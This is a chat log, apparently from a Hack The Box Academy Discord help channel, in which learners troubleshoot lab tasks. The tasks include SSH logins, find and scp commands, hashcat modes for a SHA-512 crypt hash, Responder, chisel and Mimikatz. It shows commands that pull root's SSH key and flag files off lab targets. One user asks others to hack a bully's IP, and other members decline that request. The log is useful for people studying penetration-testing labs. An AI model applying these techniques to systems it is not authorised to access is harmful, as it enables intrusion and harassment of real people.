I cant acces any other user apart from user 1 & user 0

fathom pendant
#

user3 password is the answer to user2 question and so on

wild iron
fathom pendant
#

you can definitely log in as other users

wild iron
#

im just bad relax

heavy marsh
#

I've never needed a public key to log in. I tried "-i" like I do with the captured private keys, did not work.

wild iron
#

ok i just got into user 2

#

wtf

wild iron
#

but seriously ive tried that and it didnt work the first time, i just tried now didnt work, and just redone it and now it works ?

#

nice and i am happy rn

heavy marsh
#

I have the password, why isn't SSH working?

#

It doesn't even prompt me for a password!

#

Just checked, the machine is still up. Nmap scan shows SSH is up.

arctic junco
wild iron
#

does anyone knows how to use gci -recurse and look for only length

heavy marsh
#

Anyone else having issues with posts disappearing in erratum?

novel rover
novel rover
heavy marsh
#

Still getting the same error on SMB Attacking Common Services lab

heavy marsh
novel rover
heavy marsh
#

That's what I've been told numerous times

wild iron
#

honestly i believe you

#

sometime i write the answer

#

10 times before it works

#

anyone able to help me with this pls ?

heavy marsh
#

What module @wild iron ?

wild iron
#

there is 10 times more of them

wild iron
#

at ssection skill-assesment

#

all good

#

๐Ÿ˜„

heavy marsh
#

When it doubt restart the machine. I just wasted over an hour on a bad ip.

wild iron
#

outch!

novel rover
wild iron
#

try to think outside the box maybe

#

tried chatgpt

proud sequoia
#

Where can I talk about the Sherlock labs?

wild iron
#

under the sherlock

proud sequoia
#

Where? I can't see any channel

#

No access๐Ÿฅฒ

wild iron
#

verify your account

heavy marsh
novel rover
wild iron
#

what you looking for ?

novel rover
wild iron
#

maybe you are ddosing them, can you delay each try ?

novel rover
wild iron
#

you reckon is a mistake that you do or thats from their part, you can still contact support if thats on their end tho "if you think so"

#

I haven't done that module yet, cant be of anyhelp

#

sorry brother

fathom pendant
novel rover
fathom pendant
novel rover
fathom pendant
#

then change vpn regions and try again

novel rover
#

about 20 times

wild iron
#

reboot ?

novel rover
#

Host/target just down after 5-10 sec

rain pike
#

on the question:
Send a GET request to the above server, and read the response headers to find the version of Apache running on the server, then submit it as the answer. (answer format: X.Y.ZZ
ive tried the commands... however i keep saying connection time out.... i have tried rebooting panbox and also target but same result came T^T

naive turtle
#

Hey all, anyone able to give me a hand with INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC hunt2? I'm fairly sure I got the right answer but seems to not like it when I submit. Would like to know if my understanding is completely off

wild iron
#

try to refresh the page sometime it works

naive turtle
rain pike
#

ah i see. thanks ><

latent harness
#

hey, anyone knows what to do if responder.py isn't listening anything?

wild iron
#

what are you trying to listen to ?

latent harness
#

SMB requests

wild iron
#

port ?

#

is it in a module form academy ?

latent harness
latent harness
wild iron
#

The script (responser.py) might not be designed to intercept SMB traffic specifically. If it's a script for intercepting HTTP traffic, it might not work as expected for SMB.

#

Port 80 is typically associated with HTTP traffic, not SMB (Server Message Block). SMB usually operates on ports 445 (for newer versions) and 139 (for older versions). If you are trying to intercept SMB traffic, you should check the correct port.

latent harness
#

Mmm.. I'm just following the walkthrough guide.

wild iron
#

on starting point ?

latent harness
#

Yep

wild iron
#

tier 0 or tier 1 ?

#

i mean what machine

#

whats the name of the starting point

latent harness
#

Tier 1
Responder

#

Learn the basics of Penetration Testing

wild iron
#

what step are you stuck on ?

#

i mean what task

tranquil axle
#

Are you running it with sudo?

latent harness
#

I'm suposed to get this, but my terminal is blank after listening

wild iron
#

true that can help tho

latent harness
wild iron
#

have you added the thingy in /etc/hosts/ ?

latent harness
#

Yes

wild iron
#

are you trying to hash crack ?

latent harness
#

Hash , yes

wild iron
#

ik the file rockyou.txt must be unzip or smt

next bronze
wild iron
#

dont blame me

#

๐Ÿ˜ฆ

wild iron
#

look for rockyou

#

you will see it is in a folder

#

you must get the txt out of the folder

latent harness
#

Nah... I unzipped it already

wild iron
#

oh

#

so whats the step are you stuck on ?

latent harness
next bronze
latent harness
tranquil axle
#

Are you running this on your machine or did you ssh into the provided machine first?

tranquil axle
#

Iโ€™m not sure what module you are on, but is there maybe a machine you need to ssh into first?

latent harness
next bronze
#

also, this is the wrong channel for this, please check #welcome and verify, then move to #starting-point, we'll help you there @latent harness

eager loom
# wild iron no dramas

His is different to mine they must have updated it. Im doing the find files and directories bit.

wild iron
#

oh yea

fathom pendant
next bronze
fathom pendant
#

it's probably buggy as all hell

#

because WSL

wild iron
#

I need help pls

#

thats the command i run

#

but I tried evey name none work

eager loom
#

Im still stuck on same questions as yesterday :((

brave lily
#

Can someone help in "File Upload Attack"'s skills assessment?

wild iron
eager loom
#

Ill show 2 seconds

wild iron
eager loom
brave lily
wild iron
#

Ususally the support or admin they usually do

eager loom
#

Its either it shows nothing or 1 thing that isnt giving me correct answet

wild iron
eager loom
#

Yes i said it wasnt in there

wild iron
#

Which section is that in linux fendamentals ?

eager loom
#

Umm

wild iron
#

I can check ive done it

eager loom
#

It is "find files and directories" first question

#

Other 2 ive done

wild iron
#

alright lemme check

eager loom
#

Ty ๐Ÿ™

wild iron
#

Ok whats the command your running again ?

eager loom
#

Ive tried a few 2 second leg me get it up

wild iron
#

sudo find / -type f -name *.conf -newermt 2020-03-03 -size +25k -size -28k -exec ls -al {} ; 2>/dev/null

#

try that

eager loom
#

sudo find / -type f -name *.conf -newermt 2020-03-03 -size +25k -size -28k -exec ls -al {} ;

#

Ive tried it

#

With and without the end bit

wild iron
#

2 sec then

#

sudo find / -name "*.conf" -size +25k -size -28k -newermt 2020-03-03 2>/dev/null

#

sudo find / -iname "*.conf" -size +25k -size -28k -newermt 2020-03-03 2>/dev/null

#

either

#

@eager loom

eager loom
#

ill try

#

ty

wild iron
#

worked ?

eager loom
#

it returns a file but it not saying it right

wild iron
#

whats the file ?

next bronze
eager loom
#

dnsmasq

wild iron
#

I just found that out

wild iron
eager loom
#

thats wierd only thing that shows up

wild iron
#

have you tried with the variant -iname

eager loom
#

yes

#

idk why its not working

#

i just tried the -iname again still doesnt change anything

#

same result

wild iron
#

sudo find / -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null

#

try that one

eager loom
#

ill try 2 sec

#

i get an error

#

i can copy and paste from the vm

#

so im having to type it all out

#

im using the one on their site

#

missing arguement -exec or something like that

wild iron
#

maybe you added an extra space

faint rampart
eager loom
#

yea

#

that fixed it but it just returns nothing now

wild iron
#

huh ok interesting

eager loom
#

๐Ÿ˜ญ

wild iron
#

find / -type f -name *.config -newermt 2020-03-03 -size +25k -size -28k -exec ls -al {} ; 2>/dev/null

#

try it like that

#

find / -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 2>/dev/null

#

another variant if not I am not sure

eager loom
#

i tried first one same thing

#

does nothing and that second one ive already tried

#

idk i think something is wrong is there like an admin or something

#

i can somehow talk too

#

i dont think there is a config file with all these parameters on this vm

wild iron
#

must be

next bronze
#
find / -type f -name "*.conf" -size +25k -size -28k -newermt 2020-03-03 -exec ls -la {} \; 2>/dev/null

if it doesn't work, restart the target

wild iron
#

oh yea that ;

wild iron
#

( ;)

#

ffs

#

cant backslash here

#

@next bronze how do you do that commadn line thingy

next bronze
#

backticks ` single for in line, triple for code blocks

wild iron
#

frite

#

oh yea thats cool thanks

eager loom
#

yea still returns nothing

wild iron
#

restart it then

eager loom
#

alright will do

#

still nothing

next bronze
#

you sure you entered the command correctly? I'm able to get the answer using that command

eager loom
#

im 100% sure

wild iron
#

did you try with sudo ?

#

or without ?

eager loom
#

just did with it

#

and still nothing

next bronze
#

wait

#

did you ssh into the target

eager loom
#

im vip im using 1 on the site

next bronze
#

pwnbox?

eager loom
#

i think so idk what its called

next bronze
eager loom
#

the instance u can start on the site

next bronze
#

you need to ssh into the ip given

eager loom
#

even when im directly connected

#

oh or u mean

#

i have to do it different?

#

i think i understand

wild iron
#

have you done the command ssh iptarget

next bronze
#

this, whatever the ip there for you

eager loom
#

omg

#

ill explain

#

so i thought this was for people using there own vm to connect to like this machine i guess

#

i thought if i was directly on here i dont need to do it

wild iron
#

oh well in that case ssh htb-student@iptarget

next bronze
eager loom
#

ty lol

#

omg its done ๐Ÿฅณ

wild iron
#

Well done boy !

pale bone
#

how to upload files vial curl

next bronze
#

windows or linux?

pale bone
next bronze
# pale bone linux
curl -X POST http://<ip> -F 'files=@<name>'

the server needs to accept uploads

candid lily
#

chisel error :( how to fix this

next bronze
candid lily
#

but it was demonstrated in the module

next bronze
#

the shoul have chisel installed, if nottry an older/newer version

candid lily
#

is there a way i can include all dependencies on build

#

(i dont know golang btw)

next bronze
#

you built it from source?

candid lily
#

yes

next bronze
#

grab the precompiled version from releases

candid lily
#

that was also demonstrated in the module

tacit grove
#
Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.

got root flag instead, now I'm confused xD

candid lily
#

this worked

wheat scroll
#

Someone can help me in dm to settle my ZAP ?

idle hill
#

Hey alll where is the Sherlock section here

vital adder
warm drift
#

Pleae need help with Server side attacks module set up NGINX AJP reverse proxy i keep getting this error when i try start up nginx:

nginx: [emerg] "upstream" directive is not allowed here in /etc/nginx/conf/nginx.conf:36

naive wadi
#

What is at line 36?

wheat scroll
#

How we give way to a request in ZAP ?

warm drift
wheat laurel
#

Hello everyone, I want to ask Does anyone have finished Windows privilege Escalation SeDebugPrivilege [RCE]?

wheat scroll
#

I put my HUD but when I click on Break button nothing happen

acoustic owl
wheat laurel
fallow depot
#

Guys i need help, i stuck

sterile epoch
#

Hi I am having trouble to copy files from victim to local using scp
scp will@10.129.140.240:/home/will/root.txt /loot
my loot directory is in my pwnbox home directory with path /home/htb-ac-399878/loot
I am getting /loot: Permission denied my directory permissions are 755

fallow depot
#

I stuck in linux fundamentals with task: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the โ€œhttps://www.inlanefreight.comโ€ website and filter all unique paths of that domain. Submit the number of these paths as the answer

#

I fight with this task for very long and just cant finish it :v

keen compass
#

Hi, (not sure to be in the right place to ask this, please let me know if there is a better place). I would like to ask question to some HTB Academy team member (about report writing).
Is there a specific way ? or should I just try to DM some peopls in this chan that have the HTB Staff role ?

simple hare
keen compass
sterile epoch
simple hare
#

You're 100% sure the directory exists, at that path? If so, I'm a bit rusty on what scp expects precisely, but maybe it needs a complete filename - try /home/htb-ac-399878/loot/root.txt.

keen compass
candid lily
#

i think scp only works from client to server?

keen compass
candid lily
#

so he has to run the command from target machine right

simple hare
sterile epoch
#

and assigned 755 permissions to it

nimble bane
#

Can someone hack someone's IP with their discord username, they have been bullying me and I'm not mentally okay for it

#

I'll give their discord username

sterile epoch
next bronze
sterile epoch
#

ok

nimble bane
next bronze
next bronze
nimble bane
#

They are bringing my family and threatening to leak my address....

keen compass
next bronze
sterile epoch
#

drwxr-xrwx 2 htb-ac-399878 htb-ac-399878 4096 Nov 18 13:57 loot

#
will@nix01:~$ scp will@10.129.140.240:/home/will/root.txt /home/htb-ac-399878/loot/root.txt
will@10.129.140.240's password: 
/home/htb-ac-399878/loot/root.txt: No such file or directory
candid lily
#

try from the target machine

candid lily
#

oh wait it is the target

nimble bane
#

I really wanna scare them a lot, do you know any way for me?

novel matrix
#

@nimble bane please follow the #rules

nimble bane
#

As u wish

keen compass
next bronze
candid lily
#

scp /home/will/root.txt htb-ac-399878@<yourip>:/loot/

fallow depot
#

@keen compass i dm you

candid lily
#

how to get rid of this error

sterile epoch
next bronze
# sterile epoch thanks its done

keep this for reference so that you can use it next time
Downloading Using SCP

scp <user>@<ip>:<remote path> <local path>

Uploading Using SCP

scp <local path> <user>@<ip>:<remote path>
sterile epoch
#

Thanks I noted it

simple hare
sterile epoch
#

I have one more question about hashes
$6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.
I tried using -m 1000 in hashcat but I was getting
Hashfile 'root.txt' on line 1 (4eO0Wu...uPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg): Separator unmatched I looked into it and found out $6$ is sha512 and followed by it was the hash
so I did

hashcat -m 1710 "Qsp/wU8vd2AfZLNX$C9jsDq36v3SjM8J1RNgrPkvFUxmOUoHcLUhLFVSCxjH1OcmfOsYaOyV4Flq03xEws8EpIbqkGswGRkrfhMCS9." ../mut_pass.list

I got
Hash 'Qsp/wU8vd2AfZLNX.': Separator unmatched
any hints on this?

simple hare
#

What's your full hashcat command?

next bronze
simple hare
#

I suspect you're not quoting the hash

next bronze
sterile epoch
#

ah ok thanks I guess I need to make a separate cheatsheet for hashcat

simple hare
#

Ah wait - I think I see the issue. You're using double quotes. Use single quotes - things with a $ in front between double quotes are interpreted as variables

next bronze
#

it's always better to use a txt file with hash inside, but that's not the only issue here

simple hare
#

So when you do hashcat -m 1710 "Qsp/wU8vd2AfZLNX$C9jsDq36v3SjM8J1RNgrPkvFUxmOUoHcLUhLFVSCxjH1OcmfOsYaOyV4Flq03xEws8EpIbqkGswGRkrfhMCS9." that means the $C9jsDq36v3SjM8J1RNgrPkvFUxmOUoHcLUhLFVSCxjH1OcmfOsYaOyV4Flq03xEws8EpIbqkGswGRkrfhMCS9 is interpreted as a variable, which doesn't exist, so it gets replaced with an empty string

sterile epoch
sterile epoch
#

thanks guys for the help

next bronze
#

you can crack $6$ with 1800

sterile epoch
#

yes I did that got the pass

candid lily
#

i keep getting GLIBC errors, how do i solve it

next bronze
candid lily
#

i see that there is a mismatch but how can i solve it

#

do i need to install a entire OS just to compile it

next bronze
#

what are you trying to run?

candid lily
#

ptunnel-ng

#

im following the module portforwarding, tunneling and pivoting

#

i had the problem with chisel but then it had a option to static link the binary and it solved the issue

#

i dont know if ptunnel-ng has such option

next bronze
#

hm when I did it I didnt' run into this

spring viper
#

In attacking enterprise networks I have my user in the admin localgroup but I can't do actions as if I am admin

#

did I skip a step here ._.

#

when I try to run an admin powershell the UAC tries to auth to domain\ilfserveradm which doesnt exist because ilfserveradm is just a local account so I can't do any admin actions and I don't think I missed anything in the guide

#

guess I will just have to reset and come back later :/

candid lily
#

i cannot compile it there

spring viper
#

maybe I can just make the script spawn mimikatz since it runs as root anyways peepohmm - didnt work

candid lily
#

any idea what can i do im still stuck

next bronze
candid lily
#

why is this so hard it still cannot connect

#

oop nvm

#

i specified 9050 on rdp my bad

sly kelp
#

XD

#

Good that you realized now

#

Not after 2 hours

candid lily
#

im following htb academy module, all people tell me to use the logo thing but why isnt it in htbacademy

sly kelp
#

I guess

candid lily
#

oh okay

orchid pine
#

guys someone here is using bashfuscator cuz those paylaon are not working on my kali vm after generation the pyaload trying to excute it a lot of errors

#

and all o the other payload its generate are not working

upbeat tiger
#

hello guys am new in this group i hope am accepted,

vital zephyr
#

good evening everyone, I'm stuck in a focal point in the hard footprinting laboratory, can someone help me please?

#

I need someone to tell me how to continue, because I really don't know what to do

#

helloooo

#

no one is there?

hallow kiln
#

you're gonna have to be specific, what have you already tried, where are you stuck?

vital zephyr
#

then I found with nmap that there are several open ports, including snmp ones, 161, 143,110,993,995, I used onesixtyone and found the community string, and consequently I used braa and discovered tom's credentials with pass, I used openssl pop3 and used these credentials to then discover through the various pop3 commands an ssh key, which I'm not understanding how to use, I tried to use it with tom but it gives me permission denied
tom@10.129.87.50: Permission denied (publickey).

hallow kiln
#

have you set proper permissions for the key?

vital zephyr
#

yes bro, look

#

I can't send the printout of my screen, can I write to you privately?

next bronze
hallow kiln
#

then you'll be able to post screenshots

vital zephyr
#

no i cant, i dont know why

#

but

#

in this chat i cant

#

in pvt yes

hallow kiln
#

it's because you're not verified

vital zephyr
#

on discord on in this server?

hallow kiln
#

in this server

vital zephyr
#

and how can I become verified?

vital zephyr
#

ok, i have done

#

lets see pls

#

please tell me what I can do

#

I looked at many forums and no one helped me with anything, the only option is discord, I'm stuck and I don't know what to do

vital zephyr
brittle prawn
wanton jasper
#

I am looking for the FQDN of the nameserver for the "inlanefreight.htb" but I seem to get an error here, can someone give me a nudge?

$ nslookup -type=NS inlanefreight.htb       
Server:         192.168.1.1
Address:        192.168.1.1#53

** server can't find inlanefreight.htb: NXDOMAIN
#

I hve added it to the hosts file as well

bright quiver
#

Hey there - I am working on Privesc module on academy and trying to get root. I can get to root/.ssh and i can se the id_rsa file, but when I run: scp /root/.ssh/id_rsa htb-ac-xxxxx@10.10.14.xxx:/home/htb-ac-xxxxx/Desktop I am not getting any success with it sending to my htb instance..any advice here?

wanton jasper
bright quiver
#

ok

tacit grove
wanton jasper
#

or that

bright quiver
#

didn't think it would be readable but i guess i should try that huh lol

#

works ty

tacit grove
#

I just finished the logrotate section, kinda challenging

next bronze
obtuse verge
#

Hi! Can some tell me what this error means in mimikatz?

wanton jasper
hallow kiln
obtuse verge
#

do i need admin to use this tool?

ebon jasper
ebon jasper
hallow kiln
#

I suspect you need a new line at the end of your key file

hallow kiln
obtuse verge
hallow kiln
#

pretty sure the user was local admin

vital zephyr
#

bro i finally found the mistake, thanks to payloadbunny

hallow kiln
#

was it the new line or something else?

obtuse verge
brittle prawn
#

Is the right channel to ask what module I should start on?